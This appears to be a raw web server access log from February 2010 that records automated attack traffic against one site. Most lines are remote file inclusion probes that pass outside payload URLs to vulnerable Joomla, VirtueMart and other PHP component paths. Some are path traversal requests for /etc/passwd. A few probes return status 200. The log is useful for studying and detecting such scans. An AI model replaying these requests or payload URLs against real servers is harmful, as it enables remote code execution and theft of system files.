69.13.69.245 - - [19/Feb/2010:06:37:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:06:37:05 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:38:08 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:38:08 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:38:08 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:38:08 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:06:38:26 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:06:38:29 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:38:49 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:38:49 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:38:49 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:39:16 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:39:16 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:39:16 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:39:35 -0800] "GET /logs/access_100129.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:39:40 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:39:53 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:39:53 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:39:53 -0800] "GET /logs/access_100209.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:40:08 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:40:08 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:40:08 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:40:14 -0800] "GET /logs/access_100117.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:40:47 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:40:47 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:40:47 -0800] "GET /logs/access_100205.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:40:54 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:40:54 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:40:54 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [19/Feb/2010:06:41:02 -0800] "GET /logs/access_100117.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:41:10 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:41:12 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.91.240.2 - - [19/Feb/2010:06:41:29 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.91.240.2 - - [19/Feb/2010:06:41:29 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:42:08 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:42:08 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:06:42:08 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:42:22 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:42:22 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:42:22 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:42:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:42:54 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:42:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:43:12 -0800] "GET /logs/access_100129.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:06:44:51 -0800] "GET /logs/access_100113.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:06:45:21 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:06:45:22 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:06:45:22 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:45:24 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:45:31 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:45:57 -0800] "GET /sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:45:57 -0800] "GET /sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:45:58 -0800] "GET /logs/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:45:59 -0800] "GET /logs/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:45:59 -0800] "GET /logs/access_100205.log%20%20/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:01 -0800] "GET /logs/access_100205.log%20%20/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:01 -0800] "GET /sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:01 -0800] "GET /logs/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:03 -0800] "GET /logs/access_100205.log%20%20/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:08 -0800] "GET /logs/access_100205.log%20%20/sub.php?s=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:08 -0800] "GET /sub.php?s=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:08 -0800] "GET /logs/sub.php?s=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:06:46:09 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:06:46:09 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:06:46:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.beautycnc.com/bbs/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:09 -0800] "GET /logs/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:09 -0800] "GET /sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:11 -0800] "GET /logs/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:11 -0800] "GET /sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:12 -0800] "GET /logs/access_100205.log%20%20/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:46:13 -0800] "GET /logs/access_100205.log%20%20/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:47:27 -0800] "GET /logs/access_100205.log/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:47:29 -0800] "GET /logs/access_100205.log/sub.php?s=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:47:38 -0800] "GET /logs/access_100205.log/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:47:51 -0800] "GET /logs/access_100205.log/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:47:51 -0800] "GET /logs/access_100205.log/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.235.54.152 - - [19/Feb/2010:06:48:24 -0800] "GET /logs/access_100205.log/sub.php?s=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:48:42 -0800] "GET /sub.php?s=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:48:43 -0800] "GET /logs/access_100205.log%20%20/sub.php?s=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:48:44 -0800] "GET /logs/sub.php?s=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:49:24 -0800] "GET /logs/access_100115.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:49:37 -0800] "GET /logs/access_100115.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:49:42 -0800] "GET /logs/access_100205.log/sub.php?s=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:06:50:00 -0800] "GET /logs//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:06:50:00 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:06:50:00 -0800] "GET /index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.250.124.252 - - [19/Feb/2010:06:50:03 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.250.124.252 - - [19/Feb/2010:06:50:03 -0800] "GET /logs/access_100121.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.250.124.252 - - [19/Feb/2010:06:50:03 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:06:50:17 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:50:49 -0800] "GET /index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:50:49 -0800] "GET /index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:50:56 -0800] "GET /index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:50:57 -0800] "GET /index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:06:51:07 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:06:51:07 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:06:51:07 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.15.127.10 - - [19/Feb/2010:06:51:27 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.15.127.10 - - [19/Feb/2010:06:51:27 -0800] "GET /logs//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.15.127.10 - - [19/Feb/2010:06:51:27 -0800] "GET /index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
204.15.127.10 - - [19/Feb/2010:06:51:46 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:06:51:51 -0800] "GET /logs/access_100206.log%20%20//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:52:11 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:52:11 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:52:11 -0800] "GET /logs/access_100118.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:52:34 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:52:57 -0800] "GET /logs/access_100123.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:52:57 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:52:57 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
